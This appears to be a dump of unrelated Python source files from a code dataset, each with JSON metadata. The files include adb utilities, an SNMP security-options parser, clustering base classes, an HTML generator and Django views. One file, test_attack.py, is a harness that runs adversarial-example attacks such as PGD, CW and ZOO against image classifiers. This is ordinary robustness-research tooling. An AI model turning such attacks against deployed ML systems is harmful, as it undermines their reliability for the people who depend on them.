raise errors.DeviceError(\n f\"ADB command failed: {command} with output: {output}\")\n\n\ndef _fastboot_command(command,\n fastboot_serial=None,\n fastboot_path=None,\n include_return_code=False,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Returns the output of the fastboot command and optionally the return code.\n\n Args:\n command (str or tuple): fastboot command and optionally arguments to\n execute.\n fastboot_serial (str): Device fastboot serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n include_return_code (bool): flag indicating return code should also be\n returned.\n timeout (float): in seconds to wait for fastboot command to return\n\n Raises:\n RuntimeError: if fastboot_path provided or obtained from\n get_fastboot_path is invalid (executable at path doesn't exist).\n\n Returns:\n str: The fastboot command output (including stderr)\n tuple: The fastboot command output (including stderr) and return code\n\n Note:\n The stderr is redirected to stdout so callers should use the return code\n or search the output for known errors if they want to determine if the\n command succeeded or not.\n \"\"\"\n if fastboot_path is None:\n fastboot_path = get_fastboot_path()\n if not os.path.exists(fastboot_path):\n raise RuntimeError(\n \"The fastboot_path of {} appears to be invalid.\".format(fastboot_path))\n\n if fastboot_serial is None:\n args = [\"timeout\", str(timeout), fastboot_path]\n else:\n args = [\"timeout\", str(timeout), fastboot_path, \"-s\", fastboot_serial]\n\n if isinstance(command, (str, six.text_type)):\n args.append(command)\n elif isinstance(command, (list, tuple)):\n args.extend(command)\n\n proc = subprocess.Popen(\n args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output, _ = proc.communicate()\n output = output.decode(\"utf-8\", \"replace\")\n if include_return_code:\n return output, proc.returncode\n return output\n\n\ndef install_package_on_device(package_path,\n adb_serial=None,\n adb_path=None,\n allow_downgrade=False,\n allow_test_apk=False,\n reinstall=False):\n \"\"\"Installs an apk on a target device.\n\n Use adb install command to install a package to the system.\n The options are subjected to the adb install command. See the doc.\n https://developer.android.com/studio/command-line/adb#shellcommands\n\n Args:\n package_path (str): the path to the package on host machine.\n adb_serial (str): the device serial, optional.\n adb_path (str): optional alternative path to adb executable.\n allow_downgrade (bool): allows version code downgrade.\n allow_test_apk (bool): allows test APKs to be installed.\n reinstall (bool): reinstalls an existing app and keeps its data.\n\n Raises:\n ValueError: when pacakge_path is not valid.\n DeviceError: when installation failed.\n \"\"\"\n if not os.path.exists(package_path):\n raise ValueError(\n \"install_package_on_device received invalid package_path: {}\".format(\n package_path))\n\n flags_map = {\"-d\": allow_downgrade, \"-t\": allow_test_apk, \"-r\": reinstall}\n command_list = [\"install\"]\n flags = sorted([flag for flag, value in flags_map.items() if value])\n command_list.extend(flags)\n command_list.append(package_path)\n response = _adb_command(\n tuple(command_list), adb_serial=adb_serial, adb_path=adb_path)\n if \"Success\\n\" not in response:\n raise errors.DeviceError(\n \"install_package_on_device failed: {}\".format(response))\n\n\ndef uninstall_package_on_device(package_name, adb_serial=None, adb_path=None):\n \"\"\"Uninstall a package on a target device.\n\n Args:\n package_name (str): the name of the package, e.g.,\n \"com.google.android.apps.somepackage.someapp\".\n adb_serial (str): the device serial, optional.\n adb_path (str): optional alternative path to adb executable.\n\n Raises:\n DeviceError: when uninstall failed.\n \"\"\"\n response = _adb_command((\"uninstall\", package_name),\n adb_serial=adb_serial,\n adb_path=adb_path)\n if \"Success\\n\" not in response:\n raise errors.DeviceError(\"uninstall_package_on_device failed.\")\n","sub_path":"gazoo_device/utility/adb_utils.py","file_name":"adb_utils.py","file_ext":"py","file_size_in_byte":26510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41204511","text":"# -*- coding: utf-8 -*- import sys reload(sys) sys.setdefaultencoding('utf-8')\n\n__author__ = \"anton\"\n__date__ = \"$18.08.2014 22:51:24$\"\n\nimport pickle, glob\nfor filename in glob.glob( '*.pkl' ): # для 'bob','sue','tom'\n recfile = open( filename, 'rb' )\n record = pickle.load( recfile )\n print( filename, '=>\\n ', record )\n\nsuefile = open( 'sue.pkl', 'rb' )\nprint( pickle.load( suefile )['name'] ) # извлечь имя Сью","sub_path":"db_pickle_recs/dump_db_ pickle_recs.py","file_name":"dump_db_ pickle_recs.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251744687","text":"from attack.CW import CW\nfrom attack.FGSM import FGSM\nfrom attack.OPT_attack import OPT_attack\nfrom attack.OPT_genattack import OPT_genattack\nfrom attack.ZOO import ZOO\nfrom attack.OPT_attack_lf import OPT_attack_lf\nfrom attack.Sign_OPT import OPT_attack_sign_SGD\nfrom attack.Sign_OPT_lf import OPT_attack_sign_SGD_lf\nfrom attack.NES import NES\nfrom attack.PGD import PGD\nfrom models import PytorchModel\nimport torch\nfrom allmodels import MNIST, load_model, load_mnist_data, load_cifar10_data, CIFAR10, VGG_plain, VGG_rse, VGG_vi\nimport os, argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200,\n help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=16,\n help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n help='Dropout rate (1 - keep probability).')\nparser.add_argument('--dataset', type=str, default=\"MNIST\",\n help='Dataset to be used, [MNIST, CIFAR10, Imagenet]')\nparser.add_argument('--attack', type=str, default=None,\n help='Attack to be used')\n\nparser.add_argument('--n_neigh', type=int, default=0,\n help='number of neighbors of target node')\nparser.add_argument('--start', type=int, default=0,\n help='starting node')\nparser.add_argument('--npoints', type=int, default=10,\n help='points to be added')\nparser.add_argument('--hops', type=int, default=1,\n help='hops of neighbors of target node')\nparser.add_argument('--epsilon', type=float, default=0.01,\n help='epsilon in the PGD attack')\nparser.add_argument('--verbose', action='store_true', default=False,\n help='verbose.')\nparser.add_argument('--test_batch_size', type=int, default=1,\n help='test batch_size')\nargs = parser.parse_args()\n#np.random.seed(args.seed)\n#torch.manual_seed(args.seed)\n\n\n\nif args.dataset == \"MNIST\":\n net = MNIST()\n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net,'model/mnist_gpu.pt')\n train_loader, test_loader, train_dataset, test_dataset = load_mnist_data(args.test_batch_size)\nelif args.dataset == 'CIFAR':\n net = CIFAR10() \n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net, 'model/cifar10_gpu.pt')\n train_loader, test_loader, train_dataset, test_dataset = load_cifar10_data(args.test_batch_size)\nelif args.dataset == 'Imagenet':\n net = CIFAR10() \n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net, 'cifar10_gpu.pt')\nelse:\n print(\"Unsupport dataset\")\n os.exit(0)\n\nattack_list = {\n \"PGD\":PGD,\n \"Sign_OPT\": OPT_attack_sign_SGD,\n \"Sign_OPT_lf\": OPT_attack_sign_SGD_lf,\n \"CW\": CW,\n \"OPT_attack\": OPT_attack,\n \"OPT_attack_lf\": OPT_attack_lf,\n \"FGSM\": FGSM,\n \"NES\": NES,\n \"ZOO\": ZOO\n}\n\n\nnet.cuda()\nnet.eval()\n#net = VGG_rse('VGG16', 10, 0.2,0.1, img_width=32)\n#net = VGG_plain('VGG16', 10, img_width=32)\n#net.cuda()\n#net = torch.nn.DataParallel(net, device_ids=[0])\n#load_model(net,'./defense_model/cifar10_vgg_plain.pth')\n#net.eval()\n#model = net.module if torch.cuda.is_available() else net\n#net = CIFAR10() \n#net = torch.nn.DataParallel(net, device_ids=[0])\n#load_model(net, 'cifar10_gpu.pt')\n#net.eval()\n#net.cuda()\nmodel = net.module if torch.cuda.is_available() else net\n\n\n\namodel = PytorchModel(model, bounds=[0,1], num_classes=10)\nattack = attack_list[args.attack](amodel)\n#attack = CW(amodel)\n#attack = FGSM(amodel)\n#attack = OPT_attack(amodel)\n#attack = OPT_attack_sign_SGD_lf(amodel)\n#attack = OPT_genattack(amodel) \n#attack = OPT_attack(amodel) \n#attack = NES(amodel)\n#attack = ZOO(amodel)\n#attack = PGD(amodel)\n#attack = OPT_attack_sign_SGD(amodel)\n\n#train_loader, test_loader, train_dataset, test_dataset = load_mnist_data(args.test_batch_size)\n#train_loader, test_loader, train_dataset, test_dataset = load_cifar10_data()\nfor i, (xi,yi) in enumerate(test_loader):\n print(\"image \"+str(i))\n if i==1:\n #continue\n break\n xi,yi = xi.cuda(), yi.cuda()\n #if i==3:\n #amodel.predict_ensemble(xi)\n #adv=attack(xi,yi, 0.2)\n adv=attack(xi,yi)\n #r_count= (torch.max(amodel.predict(adv),1)[1]==yi).nonzero().shape[0]\n #clean_count= (torch.max(amodel.predict(xi),1)[1]==yi).nonzero().shape[0]\n #total_r_count += r_count\n #print(clean_count - r_count, (clean_count - r_count)/clean_count)\n","sub_path":"test_attack.py","file_name":"test_attack.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579563042","text":"#\n# This file is part of snmpclitools software.\n#\n# Copyright (c) 2005-2018, Ilya Etingof \n# License: http://snmplabs.com/snmpclitools/license.html\n#\nfrom snmpclitools.cli import base\nfrom pysnmp.entity import config\nfrom pysnmp import error\n\n\nauthProtocols = {\n 'MD5': config.usmHMACMD5AuthProtocol,\n 'SHA': config.usmHMACSHAAuthProtocol,\n 'SHA224': config.usmHMAC128SHA224AuthProtocol,\n 'SHA256': config.usmHMAC192SHA256AuthProtocol,\n 'SHA384': config.usmHMAC256SHA384AuthProtocol,\n 'SHA512': config.usmHMAC384SHA512AuthProtocol,\n 'NONE': config.usmNoAuthProtocol\n}\n\nprivProtocols = {\n 'DES': config.usmDESPrivProtocol,\n '3DES': config.usm3DESEDEPrivProtocol,\n 'AES': config.usmAesCfb128Protocol,\n 'AES128': config.usmAesCfb128Protocol,\n 'AES192': config.usmAesCfb192Protocol,\n 'AES192BLMT': config.usmAesBlumenthalCfb192Protocol,\n 'AES256': config.usmAesCfb256Protocol,\n 'AES256BLMT': config.usmAesBlumenthalCfb256Protocol,\n 'NONE': config.usmNoPrivProtocol\n}\n\n\ndef getUsage():\n return \"\"\"\\\nSNMPv1/v2c security options:\n -c COMMUNITY SNMP community string (e.g. public)\nSNMPv3 security options:\n -u SECURITY-NAME SNMP USM user security name (e.g. bert)\n -l SECURITY-LEVEL security level (noAuthNoPriv|authNoPriv|authPriv)\n -a AUTH-PROTOCOL authentication protocol ID (%s)\n -A PASSPHRASE authentication protocol pass phrase (8+ chars)\n -x PRIV-PROTOCOL privacy protocol ID (%s)\n -X PASSPHRASE privacy protocol pass phrase (8+ chars)\n -E CONTEXT-ENGINE-ID context engine ID (e.g. 800000020109840301)\n -e ENGINE-ID security SNMP engine ID (e.g. 800000020109840301)\n -n CONTEXT-NAME SNMP context name (e.g. bridge1)\n -Z BOOTS,TIME destination SNMP engine boots/time\n\"\"\" % ('|'.join(sorted([x for x in authProtocols if x != 'NONE'])),\n '|'.join(sorted([x for x in privProtocols if x != 'NONE'])))\n\n# Scanner\n\n\nclass SMScannerMixIn:\n\n # SNMPv1/v2\n\n def t_community(self, s):\n r' -c '\n self.rv.append(base.ConfigToken('community'))\n\n # SNMPv3\n\n def t_authProtocol(self, s):\n r' -a '\n self.rv.append(base.ConfigToken('authProtocol'))\n\n def t_authKey(self, s):\n r' -A '\n self.rv.append(base.ConfigToken('authKey'))\n\n def t_privProtocol(self, s):\n r' -x '\n self.rv.append(base.ConfigToken('privProtocol'))\n\n def t_privKey(self, s):\n r' -X '\n self.rv.append(base.ConfigToken('privKey'))\n\n def t_securityName(self, s):\n r' -u '\n self.rv.append(base.ConfigToken('securityName'))\n\n def t_securityLevel(self, s):\n r' -l '\n self.rv.append(base.ConfigToken('securityLevel'))\n\n def t_engineID(self, s):\n r' -e '\n self.rv.append(base.ConfigToken('engineID'))\n\n def t_contextEngineId(self, s):\n r' -E '\n self.rv.append(base.ConfigToken('contextEngineId'))\n\n def t_contextName(self, s):\n r' -n '\n self.rv.append(base.ConfigToken('contextName'))\n\n def t_engineBoots(self, s):\n r' -Z '\n self.rv.append(base.ConfigToken('engineBoots'))\n\n# Parser\n\n\nclass SMParserMixIn:\n def p_smSpec(self, args):\n '''\n Option ::= SnmpV1Option\n Option ::= SnmpV3Option\n\n SnmpV1Option ::= Community\n Community ::= community string\n Community ::= community whitespace string\n\n SnmpV3Option ::= AuthProtocol\n SnmpV3Option ::= AuthKey\n SnmpV3Option ::= PrivProtocol\n SnmpV3Option ::= PrivKey\n SnmpV3Option ::= SecurityName\n SnmpV3Option ::= SecurityLevel\n SnmpV3Option ::= EngineID\n SnmpV3Option ::= ContextEngineId\n SnmpV3Option ::= ContextName\n SnmpV3Option ::= EngineBoots\n\n AuthProtocol ::= authProtocol string\n AuthProtocol ::= authProtocol whitespace string\n AuthKey ::= authKey string\n AuthKey ::= authKey whitespace string\n PrivProtocol ::= privProtocol string\n PrivProtocol ::= privProtocol whitespace string\n PrivKey ::= privKey string\n PrivKey ::= privKey whitespace string\n SecurityName ::= securityName string\n SecurityName ::= securityName whitespace string\n SecurityLevel ::= securityLevel string\n SecurityLevel ::= securityLevel whitespace string\n EngineID ::= engineID string\n EngineID ::= engineID whitespace string\n ContextEngineId ::= contextEngineId string\n ContextEngineId ::= contextEngineId whitespace string\n ContextName ::= contextName string\n ContextName ::= contextName whitespace string\n EngineBoots ::= engineBoots string\n EngineBoots ::= engineBoots whitespace string\n '''\n# Generator\n\n\nclass __SMGenerator(base.GeneratorTemplate):\n # SNMPv1/v2\n def n_Community(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['communityName'] = node[2].attr\n else:\n ctx['communityName'] = node[1].attr\n\n # SNMPv3\n def n_AuthProtocol(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr.upper()\n else:\n p = node[1].attr.upper()\n\n try:\n ctx['authProtocol'] = authProtocols[p]\n\n except KeyError:\n raise error.PySnmpError('Unknown authentication protocol \"%s\"' % p)\n\n def n_AuthKey(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr\n else:\n p = node[1].attr\n\n if len(p) < 8:\n raise error.PySnmpError('Short authentication key (8+ chars required)')\n\n ctx['authKey'] = p\n\n def n_PrivProtocol(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr.upper()\n else:\n p = node[1].attr.upper()\n\n try:\n ctx['privProtocol'] = privProtocols[p]\n\n except KeyError:\n raise error.PySnmpError('Unknown privacy protocol \"%s\"' % p)\n\n def n_PrivKey(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr\n else:\n p = node[1].attr\n\n if len(p) < 8:\n raise error.PySnmpError('Short privacy key (8+ chars required)')\n\n ctx['privKey'] = p\n\n def n_SecurityName(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['securityName'] = node[2].attr\n else:\n ctx['securityName'] = node[1].attr\n\n def n_SecurityLevel(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['securityLevel'] = node[2].attr\n else:\n ctx['securityLevel'] = node[1].attr\n\n def n_EngineID(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['engineID'] = node[2].attr\n else:\n ctx['engineID'] = node[1].attr\n\n def n_ContextEngineId(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['contextEngineId'] = node[2].attr\n else:\n ctx['contextEngineId'] = node[1].attr\n\n def n_ContextName(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['contextName'] = node[2].attr\n else:\n ctx['contextName'] = node[1].attr\n\n def n_EngineBoots(self, cbCtx, node): # XXX\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['engineBoots'] = node[2].attr\n else:\n ctx['engineBoots'] = node[1].attr\n if ',' in ctx['engineBoots']:\n ctx['engineBoots'], ctx['engineTime'] = ctx['engineBoots'].split(',', 1)\n else:\n ctx['engineTime'] = 0\n\n\ndef generator(cbCtx, ast):\n snmpEngine, ctx = cbCtx\n __SMGenerator().preorder(cbCtx, ast)\n # Commit collected data\n if ctx['versionId'] == 3:\n if 'securityName' not in ctx:\n raise error.PySnmpError('Security name not specified')\n if 'securityLevel' not in ctx:\n raise error.PySnmpError('Security level not specified')\n if ctx['securityLevel'] == 'noAuthNoPriv':\n if 'authKey' in ctx:\n del ctx['authKey']\n if 'privKey' in ctx:\n del ctx['privKey']\n elif ctx['securityLevel'] == 'authNoPriv':\n if 'privKey' in ctx:\n del ctx['privKey']\n if 'authKey' in ctx:\n if 'authProtocol' not in ctx:\n ctx['authProtocol'] = config.usmHMACMD5AuthProtocol\n else:\n ctx['authProtocol'] = config.usmNoAuthProtocol\n ctx['authKey'] = None\n if 'privKey' in ctx:\n if 'privProtocol' not in ctx:\n ctx['privProtocol'] = config.usmDESPrivProtocol\n else:\n ctx['privProtocol'] = config.usmNoPrivProtocol\n ctx['privKey'] = None\n config.addV3User(\n snmpEngine,\n ctx['securityName'],\n ctx['authProtocol'],\n ctx['authKey'],\n ctx['privProtocol'],\n ctx['privKey']\n )\n # edit SNMP engine boots/uptime\n if 'engineBoots' in ctx:\n snmpEngineBoots, = snmpEngine.msgAndPduDsp.mibInstrumController.mibBuilder.importSymbols('__SNMP-FRAMEWORK-MIB', 'snmpEngineBoots')\n snmpEngineBoots.setSyntax(\n snmpEngineBoots.getSyntax().clone(ctx['engineBoots'])\n )\n if 'engineTime' in ctx:\n snmpEngineTime, = snmpEngine.msgAndPduDsp.mibInstrumController.mibBuilder.importSymbols('__SNMP-FRAMEWORK-MIB', 'snmpEngineTime')\n snmpEngineTime.setSyntax(\n snmpEngineTime.getSyntax().clone(ctx['engineTime'])\n )\n else: # SNMPv1/v2c\n if 'communityName' not in ctx:\n raise error.PySnmpError('Community name not specified')\n ctx['securityName'] = 'my-agent'\n ctx['securityLevel'] = 'noAuthNoPriv'\n config.addV1System(\n snmpEngine,\n ctx['securityName'],\n ctx['communityName']\n )\n\n ctx['paramsName'] = ctx['securityName']\n config.addTargetParams(\n snmpEngine, ctx['paramsName'], ctx['securityName'],\n ctx['securityLevel'], ctx['versionId']\n )\n","sub_path":"snmpclitools/cli/secmod.py","file_name":"secmod.py","file_ext":"py","file_size_in_byte":10352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450216074","text":"#==============================================================================\n# Entidad\t\t\t :\tEntelgy - Banco Continental\n# Proyecto\t\t\t :\tEVL (Evaluación de Python 3.6.5.)\n# Módulo\t\t\t :\n# Fecha\tCreación\t :\t21Febrary2019\n# Objetivo\t\t\t :\tFlujo Condicional\n# BREAK CONTINUE ELSE\n# Fecha Edición\t\t :\n# Descripción\t\t : Validar un número primo\n#\n#==============================================================================\nfor n in range(2, 17):\n for x in range(2, n):\n if n % x == 0:\n print(n, 'es igual a', x, '*', n/x)\n break\n else:\n # sigue el tarea sin encontrar un factor\n print(n, 'es un numero primo')","sub_path":"BVAPYHEVL0801v01EstructuraControl/pe/etg/bbva/evalua/view/01condicional/CV0601v01BreakContinueElseWithFor.py","file_name":"CV0601v01BreakContinueElseWithFor.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"387553335","text":"from builtins import object\n\nfrom ..utils import get_matrix_in_format\nfrom sklearn.base import BaseEstimator\n\nclass GraphBuilderBase(object):\n \"\"\"An abstract base class for a graph building class used in label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self):\n super(GraphBuilderBase, self).__init__()\n\n def transform(self, y):\n \"\"\" Abstract method for graph edge map builder for a label space clusterer\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"GraphBuilderBase::transform()\")\n\n\nclass LabelSpaceClustererBase(BaseEstimator):\n \"\"\"An abstract base class for Label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self):\n super(LabelSpaceClustererBase, self).__init__()\n\n def fit_predict(self, X, y):\n \"\"\" Abstract method for clustering label space\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"LabelSpaceClustererBase::fit_predict()\")\n\n\nclass LabelSpaceNetworkClustererBase(object):\n \"\"\"An abstract base class for Label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self, graph_builder):\n \"\"\"\n\n Attributes\n ----------\n graph_builder : a GraphBuilderBase derivative class\n a graph building class for the clusterer\n \"\"\"\n super(LabelSpaceNetworkClustererBase, self).__init__()\n self.graph_builder = graph_builder\n\n def fit_predict(self, X, y):\n \"\"\" Abstract method for clustering label space\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"LabelSpaceClustererBase::fit_predict()\")\n\n\nclass LabelCooccurenceGraphBuilder(GraphBuilderBase):\n \"\"\"Base class providing API and common functions for all label\n co-occurence based multi-label classifiers.\n \"\"\"\n\n def __init__(self, weighted=None, include_self_edges=None, normalize_self_edges=None):\n \"\"\"Initializes the clusterer\n\n Attributes\n ----------\n weighted: bool\n decide whether to generate a weighted or unweighted graph.\n include_self_edges : bool\n decide whether to include self-edge i.e. label 1 - label 1 in\n co-occurrence graph\n normalize_self_edges: bool\n if including self edges, divide the (i, i) edge by 2.0\n \"\"\"\n super(LabelCooccurenceGraphBuilder, self).__init__()\n\n if weighted not in [True, False]:\n raise ValueError(\"Weighted needs to be a boolean\")\n\n if include_self_edges not in [True, False]:\n raise ValueError(\n \"Decision whether to include self edges needs to be a boolean\")\n\n if normalize_self_edges not in [True, False]:\n raise ValueError(\"Decision whether to normalize self edges needs to be a boolean\")\n\n if normalize_self_edges and not include_self_edges:\n raise ValueError(\"Include self edges must be set to true if normalization is true\")\n\n if normalize_self_edges and not weighted:\n raise ValueError(\"Normalizing self-edge weights does not make sense in an unweighted graph\")\n\n self.is_weighted = weighted\n self.include_self_edges = include_self_edges\n self.normalize_self_edges = normalize_self_edges\n\n def transform(self, y):\n \"\"\"Generate adjacency matrix from label matrix\n\n This function generates a weighted or unweighted co-occurence\n graph based on input binary label vectors\n and sets it to :code:`self.coocurence_graph`\n\n Parameters\n ----------\n y : numpy.ndarray or scipy.sparse\n dense or sparse binary matrix with shape\n :code:`(n_samples, n_labels)`\n\n Returns\n -------\n dict\n weight map with a tuple of ints as keys\n and a float value :code:`{ (int, int) : float }`\n \"\"\"\n label_data = get_matrix_in_format(y, 'lil')\n label_count = label_data.shape[1]\n edge_map = {}\n\n for row in label_data.rows:\n if self.include_self_edges:\n pairs = [(a, b) for b in row for a in row if a <= b]\n else:\n pairs = [(a, b) for b in row for a in row if a < b]\n\n for p in pairs:\n if p not in edge_map:\n edge_map[p] = 1.0\n else:\n if self.is_weighted:\n edge_map[p] += 1.0\n\n if self.normalize_self_edges:\n for i in range(label_count):\n if (i, i) in edge_map:\n edge_map[(i, i)] = edge_map[(i, i)] / 2.0\n\n return edge_map\n","sub_path":"skmultilearn/cluster/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97235576","text":"\"\"\"\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n\"\"\"\n\ndef sum_of_letter_values(string):\n score = 0\n for letter in string:\n # 64 because ord(\"A\") is 65, so this\n # expression gives 1 for \"A\"\n score += (ord(letter) - 64)\n return score\n\n\nwith open('p022_names.txt', 'r') as f:\n names = f.read()\n\nnames = names.split(\",\")\nnames = [i.strip('\\\"') for i in names]\nnames.sort()\n\nsum_of_scores = 0\nfor i, name in enumerate(names):\n pos = i+1\n val = sum_of_letter_values(name)\n\n sum_of_scores += val * pos\n\nprint(sum_of_scores)\n","sub_path":"p1-50/p22/p22.py","file_name":"p22.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25213976","text":"import io\nimport os.path\n\nfrom .remotedocument import RemoteDocument\n\n\nclass HtmlWriter:\n\n def __init__(self, output):\n self.output = output\n\n def write(self, text):\n self.output.write(text)\n\n def writeline(self, line):\n self.write(line + '\\n')\n\n def write_script_tag(self, source, type='text/javascript'):\n line = ''\n self.writeline(line)\n\n def write_meta_tag(self, attributes):\n self.write('')\n \n def write_stylesheet_tag(self, source):\n line = ''\n self.writeline(line)\n\n def include(self, file_path):\n with open(file_path, 'r') as f:\n self.writeline(f.read())\n\n\nclass MainHtml:\n\n @staticmethod\n def _default_translator(writer, app, tag, basedir):\n return\n\n def __init__(self, app, file_path):\n self.app = app\n self.file_path = file_path\n self.basedir = os.path.dirname(__file__)\n\n def translate(self, writer, translator=_default_translator,\n line_processor=None):\n with open(self.file_path, 'r') as input_file:\n for line in input_file:\n if not (line_processor is None):\n line = line_processor(line)\n if line.lstrip().startswith('-->'):\n tag = line.split()[1].strip()\n translator(writer, self.app, tag, self.basedir)\n else:\n writer.writeline(line.rstrip('\\r\\n'))\n\n\ndef get_main_html_for_app(app):\n main_html_file_path = get_main_html_file_path(app)\n return MainHtml(app, main_html_file_path)\n\n\ndef get_main_html_file_path(app):\n if hasattr(app, 'main_html_file_path'):\n return app.main_html_file_path\n\n main_dir = os.path.realpath(__file__)\n main_dir = os.path.dirname(main_dir)\n return os.path.join(main_dir, 'main.html')\n\n\ndef generate_main_html_for_server(app, ws_explicit_route, ssl):\n def main_html_translator(writer, app, tag, basedir):\n if tag == 'websocket':\n return\n if tag == 'include':\n if hasattr(app, 'include'):\n for i in app.include:\n writer.write_script_tag(i)\n return\n if tag == 'meta':\n if hasattr(app, 'meta'):\n for m in app.meta:\n writer.write_meta_tag(m.items())\n return\n if tag == 'stylesheets':\n if hasattr(app, 'stylesheets'):\n for s in app.stylesheets:\n writer.write_stylesheet_tag(s)\n return\n writer.include(os.path.join(basedir, tag))\n\n template = get_main_html_for_app(app)\n output = io.StringIO()\n writer = HtmlWriter(output)\n template.translate(writer, main_html_translator)\n main_html = output.getvalue()\n main_html = main_html.replace('__WEBSOCKET__', ws_explicit_route)\n if ssl:\n main_html = main_html.replace('ws://', 'wss://')\n return main_html\n\n\ndef generate_static_main_html(App):\n def main_html_translator(writer, app, tag, basedir):\n if tag == 'include':\n if hasattr(app, 'include'):\n for i in app.include:\n writer.write_script_tag(i)\n return\n if tag == 'meta':\n if hasattr(app, 'meta'):\n for m in app.meta:\n writer.write_meta_tag(m.items())\n return\n if tag in ['js/classy.js', 'js/weba.js']:\n writer.include(os.path.join(basedir, tag))\n return\n if tag == 'websocket':\n writer.writeline('--> ' + tag)\n return\n\n def line_processor(line):\n if line.strip() == '':\n return ''\n return line\n\n template = get_main_html_for_app(App)\n output = io.StringIO()\n writer = HtmlWriter(output)\n template.translate(writer, main_html_translator, line_processor)\n main_html = output.getvalue()\n lines = main_html.split('\\n')\n\n static_html = []\n for l in lines:\n if l.lstrip().startswith('-->'):\n rdoc = RemoteDocument()\n app = App()\n app.initialize(remote_document=rdoc, main_html=main_html)\n l = rdoc.pop_all_code()\n static_html.append(l + '\\n')\n return ''.join(static_html)\n\n","sub_path":"webalchemy/mainhtml.py","file_name":"mainhtml.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553850569","text":"from django.shortcuts import render, HttpResponse, Http404\nfrom MainApp import models\n\nauthor = {'Имя':'Павел','Отчество':'Михайлович','Фамилия':'Захаров','телефон':'8-960-545-86-86','email':'zakharovpm@rambler.ru'}\n\nitems = [\n {\"id\": 1, \"name\": \"Кроссовки abibas\" ,\"quantity\":5},\n {\"id\": 2, \"name\": \"Куртка кожаная\" ,\"quantity\":2},\n {\"id\": 3, \"name\": \"Coca-cola 1 литр\" ,\"quantity\":12},\n {\"id\": 4, \"name\": \"Картофель фри\" ,\"quantity\":0},\n {\"id\": 5, \"name\": \"Кепка\" ,\"quantity\":124},\n]\n\n\n\n\ndef home(request):\n context = {\n \"name\": \"Павел\",\n \"surname\": \"Захаров\",\n \"page_title\":\"Домашняя страница\"\n }\n return render(request,'index.html',context)\n\ndef about(request):\n return HttpResponse(f'Имя:{author[\"Имя\"]}
'\n f'Отчество:{author[\"Отчество\"]}
'\n f'Фамилия:{author[\"Фамилия\"]}
'\n f'телефон:{author[\"телефон\"]}
'\n f'email:{author[\"email\"]}
')\n\ndef get_item(request,id):\n \n item = models.Item.objects.get(pk=id)\n\n try:\n context = {\n \"name\": item.name,\n \"count\": item.count,\n \"brand\": item.brand,\n }\n return render(request, \"item.html\", context)\n except:\n raise Http404\n\ndef get_items(request):\n # _str = \"
    \"\n # for item in items:\n # _str += f\"
  1. {item['name']}
